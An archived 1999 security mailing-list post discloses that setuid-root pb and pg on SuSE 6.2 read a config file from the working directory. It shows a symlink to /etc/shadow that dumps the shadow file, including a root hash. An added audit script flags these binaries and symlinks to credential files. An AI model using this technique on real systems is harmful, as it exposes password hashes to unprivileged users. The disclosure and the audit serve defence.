Two SuSE 6.2 local root exploits

From: Brock Tellier (btellierat_private)
Date: Thu Sep 16 1999 - 17:06:24 PDT


    Greetings,
    
        /usr/bin/pb and /usr/bin/pg, suid root by default on SuSE 6.2, allow
    any user to read any file on the system as shown:
    
    susebox:/root # ls -la /usr/bin/pb
    uname -rwsr-xr-x   1 root     root        23544 Jul 22 20:07 /usr/bin/pb
    
    susebox:/root # strace /usr/bin/pb
    ...
    personality(PER_LINUX)                  = 0
    getpid()                                = 16623
    brk(0)                                  = 0x805032c
    brk(0x80504cc)                          = 0x80504cc
    brk(0x8051000)                          = 0x8051000
    open("pb.conf", O_RDONLY) <-- trouble?   = -1 ENOENT (No such file or directory)
    write(2, "pb.conf fopen: No such file or d"..., 41pb.conf fopen: No such file or directory
    ) = 41
    _exit(1)                                = ?
    susebox:/root #
    
    ---
    xnec@susebox:/tmp > id
    uid=1001(xnec) gid=100(users) groups=100(users)
    xnec@susebox:/tmp > ln -s /etc/shadow ./pb.conf
    xnec@susebox:/tmp > pb
    Unknown config line :  <root:nfpzNvX19GwRg:10850:0:10000::::> = <bin:*:8902:0:10000::::>
    Unknown config line :  <daemon:*:8902:0:10000::::> = <lp:*:9473:0:10000::::>
    Unknown config line :  <news:*:8902:0:10000::::> = <uucp:*:0:0:10000::::>
    Unknown config line :  <games:*:0:0:10000::::> = <man:*:8902:0:10000::::>
    ... etc for the entire shadow file
    
    The same scenario applies to /usr/bin/pg's pg.conf in your cwd.  These two
    programs also contain numerous buffer overflows and other insecure file
    I/O and should obviously lose their suid bits.  They cannot operate
    correctly without their s-bits unless they are run by root, but no one
    besides root will run them anyway.  These programs are not worth
    patching.
    
    Brock Tellier
    UNIX Systems Administrator
    Webley Systems
    www.webley.com
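An added audit script for the class of problem the post describes (a setuid-root binary that reads a config file from the caller's cwd); it is not part of the original post or of SuSE's tooling. The deny-list of binary names (pb, pg) and the sensitive targets come from the post; the directories to scan are parameters, and the test data below is constructed.

```sh
#!/bin/sh
# Added example: audit helpers for setuid binaries that read config files from
# the caller's cwd. Directory arguments are assumptions; pb/pg are from the post.

# list_setuid DIR: print regular files under DIR carrying the setuid bit.
list_setuid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# flag_known_bad DIR: print setuid files under DIR whose basename is on the
# deny-list of programs the post says should not be setuid at all.
flag_known_bad() {
    list_setuid "$1" | while IFS= read -r f; do
        case "$(basename "$f")" in
            pb|pg) printf '%s\n' "$f" ;;
        esac
    done
}

# strip_setuid FILE: remove the setuid bit and return 0 only if it is gone
# afterwards (find on a plain file argument prints it only if it still matches).
strip_setuid() {
    chmod u-s "$1" && [ -z "$(find "$1" -perm -4000 2>/dev/null)" ]
}

# find_sensitive_symlinks DIR: symlinks under DIR (e.g. a world-writable /tmp)
# whose target is a file a setuid reader could leak, the staging pattern above.
find_sensitive_symlinks() {
    find "$1" -xdev -type l \( -lname '/etc/shadow' -o -lname '/etc/gshadow' \
        -o -lname '/etc/passwd' \) 2>/dev/null | sort
}

# Typical use on a live box (paths are the post's):
#   flag_known_bad /usr/bin && strip_setuid /usr/bin/pb && strip_setuid /usr/bin/pg
#   find_sensitive_symlinks /tmp
```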
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:04:22 PDT